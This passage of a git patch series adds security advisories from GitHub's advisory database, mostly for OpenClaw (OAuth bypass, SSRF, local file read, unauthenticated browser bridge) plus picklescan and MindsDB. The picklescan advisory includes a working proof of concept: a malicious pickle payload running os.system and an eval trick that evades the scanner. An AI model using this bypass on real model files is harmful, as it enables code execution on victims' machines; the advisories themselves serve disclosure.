"url": "https://github.com/openclaw/openclaw/commit/9dce3d8bf83f13c067bc3c32291643d2f1f10a06" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b908388245764fb3586859f44d1dff5372b19caf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:39:00Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json b/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json new file mode 100644 index 0000000000000..ef9734b768201 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7rcp-mxpq-72pj", + "modified": "2026-02-18T17:41:00Z", + "published": "2026-02-18T17:41:00Z", + "aliases": [], + "summary": "OpenClaw Chutes manual OAuth state validation bypass can cause credential substitution", + "details": "## Summary\n\nThe manual Chutes OAuth login flow could accept attacker-controlled callback input in a way that bypassed OAuth CSRF state validation, potentially resulting in credential substitution.\n\n## Impact\n\nIf an attacker can convince a user to paste attacker-provided OAuth callback data during the manual login prompt, OpenClaw may exchange an attacker-obtained authorization code and persist tokens for the wrong Chutes account.\n\nThe automatic local callback flow is not affected (it validates state in the local HTTP callback handler).\n\n## Affected Packages / Versions\n\n- `openclaw` (npm): `<= 2026.2.13` when using the manual Chutes OAuth login flow.\n\n## Fix\n\nThe manual flow now requires the full redirect URL (must include `code` and `state`), validates the returned `state` against the expected value, and rejects code-only pastes.\n\n## Fix Commit(s)\n\n- a99ad11a4107ba8eac58f54a3c1a8a0cf5686f47\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7rcp-mxpq-72pj" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/a99ad11a4107ba8eac58f54a3c1a8a0cf5686f47" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:41:00Z", + "nvd_published_at": null + } +} \ No newline at end of file From 175bf9cac5b7529888405cc533d680f8a7e95f9b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:43:25 +0000 Subject: [PATCH 011/174] Publish GHSA-jfv4-h8mc-jcp8 --- .../GHSA-jfv4-h8mc-jcp8.json | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json diff --git a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json new file mode 100644 index 0000000000000..95b14dd073959 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfv4-h8mc-jcp8", + "modified": "2026-02-18T17:41:09Z", + "published": "2026-02-18T17:41:09Z", + "aliases": [], + "summary": "OpenClaw: Process Safety - Unvalidated PID Kill via SIGKILL in Process Cleanup", + "details": "## Summary\n\nOpenClaw CLI process cleanup used system-wide process enumeration and pattern matching to terminate processes without verifying they were owned by the current OpenClaw process. On shared hosts, unrelated processes could be terminated if they matched the pattern.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `< 2026.2.14` (including the latest published version `2026.2.13`)\n- Fixed: `2026.2.14` (planned next release)\n\n## Details\n\nThe CLI runner cleanup helpers could kill processes matched by command-line patterns without validating process ownership.\n\n## Fix\n\nProcess cleanup is now scoped to owned processes only by filtering to direct child PIDs of the current process (`ppid == process.pid`) before sending signals.\n\nHardening follow-ups:\n- Prefer graceful termination for resume cleanup (`SIGTERM`, then `SIGKILL` fallback).\n- Reduce false negatives from `ps` argv truncation by preferring wide output (`ps -axww`) with a fallback.\n- Tighten command-line token matching to avoid substring matches.\n\n## Fix Commit(s)\n\n- 6084d13b956119e3cf95daaf9a1cae1670ea3557\n- eb60e2e1b213740c3c587a7ba4dbf10da620ca66\n\n## Release Process Note\n\nThis advisory is pre-set with patched version `2026.2.14`. After `2026.2.14` is published to npm, the remaining step should be to publish this advisory.\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jfv4-h8mc-jcp8" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6084d13b956119e3cf95daaf9a1cae1670ea3557" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/eb60e2e1b213740c3c587a7ba4dbf10da620ca66" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-283" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:41:09Z", + "nvd_published_at": null + } +} \ No newline at end of file From 600a0a3c8cbe3424156c908e73c8eebb9b38af90 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:46:16 +0000 Subject: [PATCH 012/174] Publish Advisories GHSA-97f8-7cmv-76j2 GHSA-h9g4-589h-68xv GHSA-rwj8-p9vq-25gv GHSA-x22m-j5qq-j49m --- .../GHSA-97f8-7cmv-76j2.json | 59 +++++++++++++++ .../GHSA-h9g4-589h-68xv.json | 71 +++++++++++++++++++ .../GHSA-rwj8-p9vq-25gv.json | 67 +++++++++++++++++ .../GHSA-x22m-j5qq-j49m.json | 67 +++++++++++++++++ 4 files changed, 264 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json diff --git a/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json b/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json new file mode 100644 index 0000000000000..b8af51a354c0f --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97f8-7cmv-76j2", + "modified": "2026-02-18T17:45:52Z", + "published": "2026-02-18T17:45:52Z", + "aliases": [], + "summary": "Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER", + "details": "### Summary\nThis is a scanning bypass to `scan_pytorch` function in `picklescan`. As we can see in the implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) that uses `pickletools.genops(data)` to get the `magic_number` with the condition `opcode.name` includes `INT` or `LONG`, but the PyTorch's implemtation simply uses [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to get this `magic_number`. For this implementation difference, we then can embed the `magic_code` into the `PyTorch` file via dynamic `eval` on the `\\_\\_reduce\\_\\_` trick, which can make the `pickletools.genops(data)` cannot get the `magic_code` in `INT` or `LONG` type, but the `pickle_module.load()` can still return the same `magic_code`, eading to a bypass.\n\n### PoC\n#### Attack Step 1\nwe can edit the source code of the function [\\_legacy\\_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows:\n```Python\n class payload:\n def __reduce__(self):\n return (eval, ('MAGIC_NUMBER',))\n\n pickle_module.dump(payload(), f, protocol=pickle_protocol)\n```\n#### Attack Step 2\nwith the modified version of `PyTorch`, we run the following PoC to generate the `payload.pt`:\n```Python\nimport torch \n\nclass payload:\n def __reduce__(self):\n return (__import__('os').system, ('touch /tmp/hacked',))\n\ntorch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)\n```\n\n#### Picklescan result\n```\nERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356\n----------- SCAN SUMMARY -----------\nScanned files: 0\nInfected files: 0\nDangerous globals: 0\n```\n\n#### Victim Step\n```Python\nimport torch\ntorch.load('./payload.pt', weights_only=False)\n```\nthen you can find the illegal file `/tmp/hacked` created in your local system.\n\n### Impact\nCraft malicious `PyTorch` payloads to bypass `picklescan`, then recall ACE/RCE.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "picklescan" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-97f8-7cmv-76j2" + }, + { + "type": "WEB", + "url": "https://github.com/mmaitre314/picklescan/commit/b9997634683a4f4bd0c7e3701e7ce7e90fe70e8c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mmaitre314/picklescan" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:45:52Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json b/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json new file mode 100644 index 0000000000000..5b9c08f0000c3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json @@ -0,0 +1,71 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9g4-589h-68xv", + "modified": "2026-02-18T17:45:31Z", + "published": "2026-02-18T17:45:31Z", + "aliases": [], + "summary": "OpenClaw has an authentication bypass in sandbox browser bridge server", + "details": "## Summary\n\nopenclaw could start the sandbox browser bridge server without authentication.\n\nWhen the sandboxed browser is enabled, openclaw runs a local (loopback) HTTP bridge that exposes browser control endpoints (for example `/profiles`, `/tabs`, `/tabs/open`, `/agent/*`). Due to missing auth wiring in the sandbox initialization path, that bridge server accepted requests without requiring gateway auth.\n\n## Impact\n\nA local attacker (any process on the same machine) could access the bridge server port and:\n\n- enumerate open tabs and retrieve CDP WebSocket URLs\n- open/close/navigate tabs\n- execute JavaScript in page contexts via CDP\n- exfiltrate cookies/session data and page contents from authenticated sessions\n\nThis is a localhost-only exposure (CVSS AV:L), but provides full browser-session compromise for sandboxed browser usage.\n\n## Affected Versions\n\n- Introduced in: `2026.1.29-beta.1` (first npm release that shipped the sandbox browser bridge)\n- Affected range: `>=2026.1.29-beta.1 <2026.2.14`\n\n## Patched Versions\n\n- `2026.2.14`\n\n## Mitigation\n\n- Upgrade to `2026.2.14` (recommended).\n- Or disable the sandboxed browser (`agents.defaults.sandbox.browser.enabled=false`).\n\n## Fix Details\n\n- The sandbox browser bridge server now always requires auth and enforces the same gateway browser control auth (token/password) that loopback browser clients already use.\n- Additional hardening: bridge server refuses non-loopback binds; local helper servers are bound to loopback.\n- Added regression tests (including unit coverage for per-port bridge auth fallback).\n\nFix commits:\n\n- openclaw/openclaw@4711a943e30bc58016247152ba06472dab09d0b0\n- openclaw/openclaw@6dd6bce997c48752134f2d6ed89b27de01ced7e3\n- openclaw/openclaw@cd84885a4ac78eadb7bf321aae98db9519426d67\n## Credits\n\nThanks to Adnan Jakati (@jackhax) of [Praetorian](https://www.praetorian.com/) for reporting this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.29-beta.1" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h9g4-589h-68xv" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/4711a943e30bc58016247152ba06472dab09d0b0" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6dd6bce997c48752134f2d6ed89b27de01ced7e3" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/cd84885a4ac78eadb7bf321aae98db9519426d67" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:45:31Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json b/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json new file mode 100644 index 0000000000000..643dd48b64b4f --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwj8-p9vq-25gv", + "modified": "2026-02-18T17:44:58Z", + "published": "2026-02-18T17:44:58Z", + "aliases": [], + "summary": "OpenClaw has a LFI in BlueBubbles media path handling", + "details": "### Summary\nThe BlueBubbles extension accepted attacker-controlled local filesystem paths via `mediaPath` and could read arbitrary local files from disk before sending them as media attachments.\n\n### Details\nWhen `sendBlueBubblesMedia` received a non-HTTP media source, the previous implementation resolved it to a local path and read it directly from disk. There was no required allowlist of safe directories, so values like `/etc/passwd` (or equivalent sensitive paths on other platforms) could be requested and exfiltrated.\n\nThe fix hardens local media loading by requiring explicit configured roots (`channels.bluebubbles.mediaLocalRoots`) and by enforcing canonical-path containment checks before reading local files. Paths outside allowed roots are rejected.\n\nFix PR: https://github.com/openclaw/openclaw/pull/16322\nFix commit: https://github.com/openclaw/openclaw/commit/71f357d9498cebb0efe016b0496d5fbe807539fc\n\n### Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< v2026.2.14`\n- Fixed: `>= v2026.2.14` (planned)\n\n### Impact\nAn attacker able to trigger BlueBubbles media sends could exfiltrate local files accessible to the OpenClaw process.\n\n### Remediation\nUpgrade to a release that includes commit `71f357d9498cebb0efe016b0496d5fbe807539fc` and configure `channels.bluebubbles.mediaLocalRoots` to explicit trusted directories.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rwj8-p9vq-25gv" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/16322" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/71f357d9498cebb0efe016b0496d5fbe807539fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:44:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json b/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json new file mode 100644 index 0000000000000..f469774848c76 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x22m-j5qq-j49m", + "modified": "2026-02-18T17:45:12Z", + "published": "2026-02-18T17:45:12Z", + "aliases": [], + "summary": "OpenClaw has two SSRF via sendMediaFeishu and markdown image fetching in Feishu extension", + "details": "### Summary\nThe Feishu extension could fetch attacker-controlled remote URLs in two paths without SSRF protections:\n\n- `sendMediaFeishu(mediaUrl)`\n- Feishu DocX markdown image URLs (write/append -> image processing)\n\n### Affected versions\n- `< 2026.2.14`\n\n### Patched versions\n- `>= 2026.2.14`\n\n### Impact\nIf an attacker can influence tool calls (directly or via prompt injection), they may be able to trigger requests to internal services and re-upload the response as Feishu media.\n\n### Remediation\nUpgrade to OpenClaw `2026.2.14` or newer.\n\n### Notes\nThe fix routes Feishu remote media fetching through hardened runtime helpers that enforce SSRF policies and size limits.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x22m-j5qq-j49m" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/16285" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/5b4121d6011a48c71e747e3c18197f180b872c5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:45:12Z", + "nvd_published_at": null + } +} \ No newline at end of file From 51aad82d6223f946c3a0f0dab3ff2852d7b143a9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:48:30 +0000 Subject: [PATCH 013/174] Publish GHSA-6xw9-2p64-7622 --- .../GHSA-6xw9-2p64-7622.json | 37 +++++++++++++++---- 1 file changed, 29 insertions(+), 8 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json (70%) diff --git a/advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json b/advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json similarity index 70% rename from advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json rename to advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json index fad76fe75e122..4b5c170ad0b05 100644 --- a/advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json +++ b/advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json @@ -1,12 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-6xw9-2p64-7622", - "modified": "2026-02-16T06:31:29Z", + "modified": "2026-02-18T17:47:09Z", "published": "2026-02-16T06:31:29Z", "aliases": [ "CVE-2026-2531" ], - "details": "A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 74d6f0fd4b630218519a700fbee1c05c7fd4b1ed. It is best practice to apply a patch to resolve this issue.", + "summary": "MindsDB affected by a SSRF vulnerability", + "details": "A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.", "severity": [ { "type": "CVSS_V3", @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "MindsDB" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "25.14.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -36,7 +57,7 @@ "url": "https://github.com/themavik/mindsdb/commit/74d6f0fd4b630218519a700fbee1c05c7fd4b1ed" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/mindsdb/mindsdb" }, { @@ -56,9 +77,9 @@ "cwe_ids": [ "CWE-918" ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:47:09Z", "nvd_published_at": "2026-02-16T04:15:51Z" } } \ No newline at end of file From 5b7321cdfff9966c097a7ed8b37fd1220badb3b3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 18:32:01 +0000 Subject: [PATCH 014/174] Advisory Database Sync --- .../GHSA-4gm2-v7j4-74p8.json | 13 ++- .../GHSA-2764-3pqr-49w6.json | 3 +- .../GHSA-9cmp-2g73-ff98.json | 1 + .../GHSA-qhp7-446p-xq88.json | 1 + .../GHSA-xr9j-c7v6-7542.json | 1 + .../GHSA-v727-f437-6cxx.json | 1 + .../GHSA-prhq-c3gx-jhwg.json | 3 +- .../GHSA-2whf-r4r4-c662.json | 2 +- .../GHSA-365g-rr2h-rx65.json | 37 +++++++ .../GHSA-3cgw-cpcx-p7g4.json | 4 +- .../GHSA-3w2g-4qx3-2mmw.json | 41 ++++++++ .../GHSA-4mcw-fcqm-vqg3.json | 56 +++++++++++ .../GHSA-4v8p-q39m-4pj8.json | 36 +++++++ .../GHSA-4vmx-r9fj-4cm5.json | 36 +++++++ .../GHSA-55vh-w3p8-qq9g.json | 33 +++++++ .../GHSA-5jgq-pv8m-5cx7.json | 33 +++++++ .../GHSA-5pqm-c33h-22jc.json | 33 +++++++ .../GHSA-5q5x-wqxc-vv25.json | 40 ++++++++ .../GHSA-5qf3-3gp9-pjx6.json | 41 ++++++++ .../GHSA-5qq8-6gv4-wmcc.json | 36 +++++++ .../GHSA-636r-hfj8-v9m7.json | 6 +- .../GHSA-64jv-v62f-2xrg.json | 36 +++++++ .../GHSA-6rjp-j8mc-4f57.json | 60 ++++++++++++ .../GHSA-6xrx-3vj8-2rjc.json | 33 +++++++ .../GHSA-74jq-6q38-p5wf.json | 1 + .../GHSA-74rw-28vp-8wh9.json | 6 +- .../GHSA-78xc-39m5-v2c6.json | 37 +++++++ .../GHSA-7fjm-558r-4j8r.json | 38 ++++++++ .../GHSA-7p94-766c-hgjp.json | 36 +++++++ .../GHSA-85h6-5m3v-gx37.json | 15 ++- .../GHSA-876r-52fj-4pxf.json | 41 ++++++++ .../GHSA-8j5g-3q2r-xfjh.json | 37 +++++++ .../GHSA-8rh3-rvv2-3mr4.json | 3 +- .../GHSA-8rqj-9226-cwx7.json | 33 +++++++ .../GHSA-9pjv-cqr5-4xh7.json | 96 +++++++++++++++++++ .../GHSA-9wwr-2jh3-482p.json | 41 ++++++++ .../GHSA-c56r-fcf4-6rp2.json | 10 +- .../GHSA-chpq-fr33-gp2m.json | 40 ++++++++ .../GHSA-f2fg-5m3g-hqwv.json | 36 +++++++ .../GHSA-f5pv-9whq-7mv7.json | 36 +++++++ .../GHSA-f7cx-4c4g-9g59.json | 6 +- .../GHSA-f7pj-q7w5-89fg.json | 41 ++++++++ .../GHSA-fqrv-m9rv-j33j.json | 36 +++++++ .../GHSA-g3vh-wfh4-fp76.json | 33 +++++++ .../GHSA-g4wf-v389-9w53.json | 2 +- .../GHSA-h437-rr98-fx56.json | 37 +++++++ .../GHSA-hcrc-x9p4-f9jh.json | 38 ++++++++ .../GHSA-hxp3-qj63-m9j9.json | 4 +- .../GHSA-j6h2-wr53-6vcg.json | 41 ++++++++ .../GHSA-j87r-wgfm-7fjj.json | 41 ++++++++ .../GHSA-jggw-c47g-3w3q.json | 6 +- .../GHSA-jp99-8xc8-367m.json | 33 +++++++ .../GHSA-m34c-wrf8-mw69.json | 41 ++++++++ .../GHSA-m4f3-qp2w-gwh6.json | 40 ++++++++ .../GHSA-m4v3-95xp-3j5h.json | 33 +++++++ .../GHSA-mc8x-4j6m-qj3r.json | 6 +- .../GHSA-mx4x-pxgm-r77w.json | 37 +++++++ .../GHSA-p525-h9pq-233r.json | 29 ++++++ .../GHSA-p68h-c56f-p3v6.json | 41 ++++++++ .../GHSA-q5q3-fgwr-rr9h.json | 4 +- .../GHSA-v3v9-r7ff-976x.json | 33 +++++++ .../GHSA-v9g2-54rr-mxmg.json | 4 +- .../GHSA-w35p-gjc5-2g6r.json | 44 +++++++++ .../GHSA-w94g-pmcx-r454.json | 41 ++++++++ .../GHSA-wfhp-qgm8-5p5c.json | 15 ++- .../GHSA-wp4v-6rrv-wqv9.json | 4 +- .../GHSA-wxwg-9693-mqg4.json | 4 +- .../GHSA-xfjv-gcf8-3jqc.json | 6 +- .../GHSA-xw73-fccw-fgc4.json | 36 +++++++ .../GHSA-xw8j-p597-rjrj.json | 4 +- 70 files changed, 1803 insertions(+), 29 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json create mode 100644 